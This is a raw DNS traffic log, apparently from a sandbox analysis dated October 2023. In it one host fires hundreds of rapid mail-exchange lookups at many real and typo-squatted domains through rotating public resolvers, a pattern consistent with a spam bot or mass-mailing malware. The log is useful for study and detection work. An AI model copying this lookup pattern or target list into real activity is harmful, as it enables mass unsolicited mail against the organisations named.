                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.341589928 CEST192.168.2.38.8.8.80xbe4aStandard query (0)sequere.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.342333078 CEST192.168.2.31.0.0.10xbe4aStandard query (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.342354059 CEST192.168.2.39.9.9.90xbe4aStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.342354059 CEST192.168.2.39.9.9.90xbe4aStandard query (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.342683077 CEST192.168.2.31.1.1.10xbe4aStandard query (0)4mail.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.343050957 CEST192.168.2.38.8.4.40xbe4aStandard query (0)paragon-are.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.343367100 CEST192.168.2.31.0.0.10xbe4aStandard query (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.343779087 CEST192.168.2.3149.112.112.1120xbe4aStandard query (0)vishalmangalwadi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.344047070 CEST192.168.2.38.8.8.80xbe4aStandard query (0)pullman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.356837034 CEST192.168.2.39.9.9.90xce4aStandard query (0)spetema.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.356898069 CEST192.168.2.3208.67.220.2200xce4aStandard query (0)virglio.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.357342958 CEST192.168.2.3208.67.220.2200xce4aStandard query (0)choice-furniture.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.357608080 CEST192.168.2.31.1.1.10xce4aStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.358103037 CEST192.168.2.3208.67.222.2220xce4aStandard query (0)gwyneddwealthpartners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.361855984 CEST192.168.2.39.9.9.90xce4aStandard query (0)miles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.362183094 CEST192.168.2.3149.112.112.1120xce4aStandard query (0)new-purse.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.362446070 CEST192.168.2.3149.112.112.1120xce4aStandard query (0)hotmmai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.362895012 CEST192.168.2.31.0.0.10xce4aStandard query (0)24.com.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.362895012 CEST192.168.2.31.0.0.10xce4aStandard query (0)eamil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.372128010 CEST192.168.2.31.1.1.10xde4aStandard query (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.372755051 CEST192.168.2.3208.67.222.2220xc84bStandard query (0)zippymail.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.372755051 CEST192.168.2.3208.67.222.2220xc84bStandard query (0)conceriacaponigiuseppe.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.373039007 CEST192.168.2.39.9.9.90xc84bStandard query (0)meta-lab.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.373500109 CEST192.168.2.39.9.9.90xc84bStandard query (0)gmaiul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.373501062 CEST192.168.2.3208.67.220.2200xc84bStandard query (0)sgcm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.374118090 CEST192.168.2.3149.112.112.1120xc84bStandard query (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.374141932 CEST192.168.2.3208.67.220.2200xc84bStandard query (0)fallsburgny.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.374624014 CEST192.168.2.31.1.1.10xc84bStandard query (0)nomatech.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.374645948 CEST192.168.2.31.0.0.10xc84bStandard query (0)kudrlicka.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.387984037 CEST192.168.2.38.8.4.40xd84bStandard query (0)jardiland.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.388046980 CEST192.168.2.3208.67.222.2220xd84bStandard query (0)mouseclicker.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.388571978 CEST192.168.2.31.0.0.10xd84bStandard query (0)2max.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.388571978 CEST192.168.2.3208.67.220.2200xd84bStandard query (0)quest-global.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.388837099 CEST192.168.2.39.9.9.90xd84bStandard query (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.389203072 CEST192.168.2.31.1.1.10xd84bStandard query (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.389467001 CEST192.168.2.38.8.8.80xd84bStandard query (0)networkvenezuela.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.389962912 CEST192.168.2.3208.67.222.2220xd84bStandard query (0)romao.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.389962912 CEST192.168.2.3208.67.220.2200xd84bStandard query (0)hotpop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.390259981 CEST192.168.2.3208.67.220.2200xd84bStandard query (0)eindia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.403486967 CEST192.168.2.38.8.8.80xe74bStandard query (0)vladuz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.404035091 CEST192.168.2.39.9.9.90xe74bStandard query (0)linder.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.404608011 CEST192.168.2.3149.112.112.1120xe74bStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.404614925 CEST192.168.2.31.0.0.10xe74bStandard query (0)gunit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.405205965 CEST192.168.2.38.8.8.80xe74bStandard query (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.405268908 CEST192.168.2.3208.67.220.2200xe74bStandard query (0)bisok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.405927896 CEST192.168.2.31.1.1.10xe74bStandard query (0)ellusions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.406373978 CEST192.168.2.38.8.8.80xe74bStandard query (0)tanya.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.406378031 CEST192.168.2.3208.67.220.2200xe74bStandard query (0)moakt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419286966 CEST192.168.2.38.8.8.80xf74bStandard query (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.420772076 CEST192.168.2.38.8.4.40xf74bStandard query (0)lianhuistone.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.420772076 CEST192.168.2.39.9.9.90xf74bStandard query (0)tph.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.421389103 CEST192.168.2.38.8.8.80xf74bStandard query (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.422327995 CEST192.168.2.38.8.8.80xf74bStandard query (0)soluzioni-sw.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.422338009 CEST192.168.2.3208.67.222.2220xf74bStandard query (0)icoud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.422924995 CEST192.168.2.3208.67.222.2220xf74bStandard query (0)nsbuechner.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.422924995 CEST192.168.2.3208.67.222.2220xf74bStandard query (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.424160957 CEST192.168.2.39.9.9.90xf74bStandard query (0)2980.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.545305014 CEST192.168.2.31.1.1.10x3ffaStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.700937986 CEST192.168.2.3185.159.196.20xfb4dStandard query (0)vdn.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.703013897 CEST192.168.2.3192.12.94.300xfb4dStandard query (0)karan-carpets.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.703787088 CEST192.168.2.3192.12.94.300xfb4dStandard query (0)suddenlink.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.704413891 CEST192.168.2.3192.12.94.300xfb4dStandard query (0)fastleader.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.705118895 CEST192.168.2.3192.31.80.300xfb4dStandard query (0)cho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.716286898 CEST192.168.2.3192.12.94.300xa4eStandard query (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.717030048 CEST192.168.2.3192.36.135.1070xa4eStandard query (0)np011.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.717869043 CEST192.168.2.3192.31.80.300xa4eStandard query (0)dfoofmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.718502045 CEST192.168.2.3216.239.32.990xa4eStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.719276905 CEST192.168.2.3162.159.26.1360xa4eStandard query (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.719722986 CEST192.168.2.3192.99.158.2450xa4eStandard query (0)emial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.720978022 CEST192.168.2.3192.31.80.300xa4eStandard query (0)pacificcoast.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.720978022 CEST192.168.2.3192.31.80.300xa4eStandard query (0)fedteldirect.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.721647024 CEST192.168.2.3192.12.94.300xa4eStandard query (0)ch2m.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.722362041 CEST192.168.2.3192.12.94.300xa4eStandard query (0)nscable.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.732645035 CEST192.168.2.3156.154.132.2000x1a4eStandard query (0)cfremails.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.733139038 CEST192.168.2.3192.12.94.300x1a4eStandard query (0)epbfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.734080076 CEST192.168.2.31.1.1.10xfe26Standard query (0)ns-203.awsdns-25.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.780031919 CEST192.168.2.31.1.1.10x2ca2Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.888618946 CEST192.168.2.31.1.1.10xb1b2Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.931255102 CEST192.168.2.3205.251.192.2030xc04fStandard query (0)ghnt.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.932013988 CEST192.168.2.3199.19.56.10xc04fStandard query (0)mrhc.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.932797909 CEST192.168.2.3192.12.94.300xc04fStandard query (0)cropking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.934901953 CEST192.168.2.3199.19.56.10xc04fStandard query (0)fbconcord.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.935668945 CEST192.168.2.3199.19.56.10xcf4fStandard query (0)slochamber.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.936281919 CEST192.168.2.3192.12.94.300xcf4fStandard query (0)cablevision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.937050104 CEST192.168.2.345.142.220.390xcf4fStandard query (0)mclink.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.951128960 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)vmbuildingsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.951894999 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)fhbg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.952553034 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)syntrans.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.953315020 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)gftg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.954082966 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.954799891 CEST192.168.2.3192.31.80.300xdf4fStandard query (0)rootfest.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.956432104 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)adinet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.956962109 CEST192.168.2.3192.12.94.300xdf4fStandard query (0)srbattery.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.958430052 CEST192.168.2.3156.154.125.700xdf4fStandard query (0)optilink.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.958430052 CEST192.168.2.3192.31.80.300xdf4fStandard query (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.967236042 CEST192.168.2.3192.12.94.300xef4fStandard query (0)minock.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.967802048 CEST192.168.2.3192.12.94.300xef4fStandard query (0)husi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.969050884 CEST192.168.2.3192.31.80.300xef4fStandard query (0)medianis.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.969052076 CEST192.168.2.3192.12.94.300xef4fStandard query (0)sninternet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.970221043 CEST192.168.2.3194.146.106.1140xef4fStandard query (0)klett.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.971354008 CEST192.168.2.3192.12.94.300xef4fStandard query (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.971776009 CEST192.168.2.3192.31.80.300xef4fStandard query (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.972475052 CEST192.168.2.3192.12.94.300xef4fStandard query (0)equalt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.973093033 CEST192.168.2.3192.12.94.300xef4fStandard query (0)ymaio.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.974211931 CEST192.168.2.31.1.1.10x20a9Standard query (0)piotr.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.140233994 CEST192.168.2.3108.162.193.2220x9a50Standard query (0)dcdi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.154783010 CEST192.168.2.365.22.196.10xaa50Standard query (0)lancemore.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.155992031 CEST192.168.2.3194.146.106.1140xaa50Standard query (0)digitalmind.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.157141924 CEST192.168.2.3193.176.144.220xaa50Standard query (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.158416986 CEST192.168.2.3192.12.94.300xaa50Standard query (0)a3.vi2software.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.158416986 CEST192.168.2.3192.12.94.300xaa50Standard query (0)otegroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.166387081 CEST192.168.2.3192.12.94.300xaa50Standard query (0)visu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.166387081 CEST192.168.2.3185.159.196.20xaa50Standard query (0)whistlerlibrary.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.167020082 CEST192.168.2.3199.19.56.10xb451Standard query (0)lbindustries.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.167697906 CEST192.168.2.3192.12.94.300xb451Standard query (0)personeltedarik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.169147015 CEST192.168.2.3192.12.94.300xb451Standard query (0)mxa-00300601.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.169816017 CEST192.168.2.31.1.1.10xd50dStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.186511993 CEST192.168.2.3192.12.94.300xc351Standard query (0)troygroup.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.186774015 CEST192.168.2.3192.203.230.100xc351Standard query (0)mx.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.187525034 CEST192.168.2.3202.248.20.1560xc351Standard query (0)mx2.nifty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.189198971 CEST192.168.2.3195.243.137.260xc351Standard query (0)mailin100.dcpserver.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.189532995 CEST192.168.2.3108.162.192.1100xc351Standard query (0)mx.moakt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.190547943 CEST192.168.2.3198.97.190.530xc351Standard query (0)mta-gw.infomaniak.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.193205118 CEST192.168.2.3192.12.94.300xc351Standard query (0)mxb-00033b02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.200974941 CEST192.168.2.3192.12.94.300xd351Standard query (0)mxa-0034a001.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.202524900 CEST192.168.2.3195.243.137.260xd351Standard query (0)nsp2.thold-it.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.203450918 CEST192.168.2.3192.12.94.300xd351Standard query (0)mail2.g1.pair.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.204123974 CEST192.168.2.364.68.192.100xd351Standard query (0)avivadirectory.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.205203056 CEST192.168.2.3192.12.94.300xd351Standard query (0)cp-tel-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.206013918 CEST192.168.2.3192.31.80.300xd351Standard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.218229055 CEST192.168.2.3198.41.0.40xe351Standard query (0)mailstream-west.mxrecord.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.218230963 CEST192.168.2.3192.12.94.300xe351Standard query (0)mx4.burnserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.220252991 CEST192.168.2.3210.124.234.150xe351Standard query (0)mail.dbins.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.220875025 CEST192.168.2.3192.12.94.300xe351Standard query (0)rapinfosolutions-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.233011007 CEST192.168.2.3192.12.94.300xf251Standard query (0)cluster1a.eu.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.234486103 CEST192.168.2.3194.0.28.530xf251Standard query (0)mx1.mijndomein.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.235901117 CEST192.168.2.3192.12.94.300xf251Standard query (0)aspmx3.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.235902071 CEST192.168.2.3192.12.94.300xf251Standard query (0)smtp.safesysmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.310811996 CEST192.168.2.3208.67.222.2220x4052Standard query (0)thenews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.329209089 CEST192.168.2.31.1.1.10x5052Standard query (0)vlad.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.342375994 CEST192.168.2.3208.67.222.2220x6052Standard query (0)refinedprojects.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.357208014 CEST192.168.2.38.8.8.80x6f52Standard query (0)coe.intMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.372246027 CEST192.168.2.39.9.9.90x7f52Standard query (0)platinumthree.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.374155998 CEST192.168.2.38.8.4.40x8e52Standard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.374758005 CEST192.168.2.38.8.4.40x8e52Standard query (0)eslite.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.376368046 CEST192.168.2.38.8.4.40x8e52Standard query (0)247virtualassistant.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.388206005 CEST192.168.2.3149.112.112.1120x9e52Standard query (0)omicronlambda.ezbunko.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.388755083 CEST192.168.2.39.9.9.90x9e52Standard query (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.388756990 CEST192.168.2.31.0.0.10x9e52Standard query (0)netcourrier.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.389316082 CEST192.168.2.3149.112.112.1120x9e52Standard query (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.389318943 CEST192.168.2.3208.67.220.2200x9e52Standard query (0)onlinesadik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.389693022 CEST192.168.2.3208.67.220.2200x9e52Standard query (0)graystoneventures.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.389883041 CEST192.168.2.3208.67.220.2200x9e52Standard query (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.390223026 CEST192.168.2.31.1.1.10x9e52Standard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.390642881 CEST192.168.2.3208.67.220.2200x9e52Standard query (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.390993118 CEST192.168.2.3149.112.112.1120x9e52Standard query (0)scbcameroun.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.403343916 CEST192.168.2.31.1.1.10xae52Standard query (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.403620958 CEST192.168.2.38.8.8.80xae52Standard query (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.403858900 CEST192.168.2.31.1.1.10xae52Standard query (0)logicsupport.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.404314995 CEST192.168.2.31.1.1.10xae52Standard query (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.404316902 CEST192.168.2.38.8.8.80xae52Standard query (0)adorfon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.404877901 CEST192.168.2.3149.112.112.1120xae52Standard query (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.404877901 CEST192.168.2.3149.112.112.1120xae52Standard query (0)gunz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.405165911 CEST192.168.2.3208.67.222.2220xae52Standard query (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.405493975 CEST192.168.2.3149.112.112.1120xae52Standard query (0)uf.comMX (Mail exchange)IN (0x0001)false
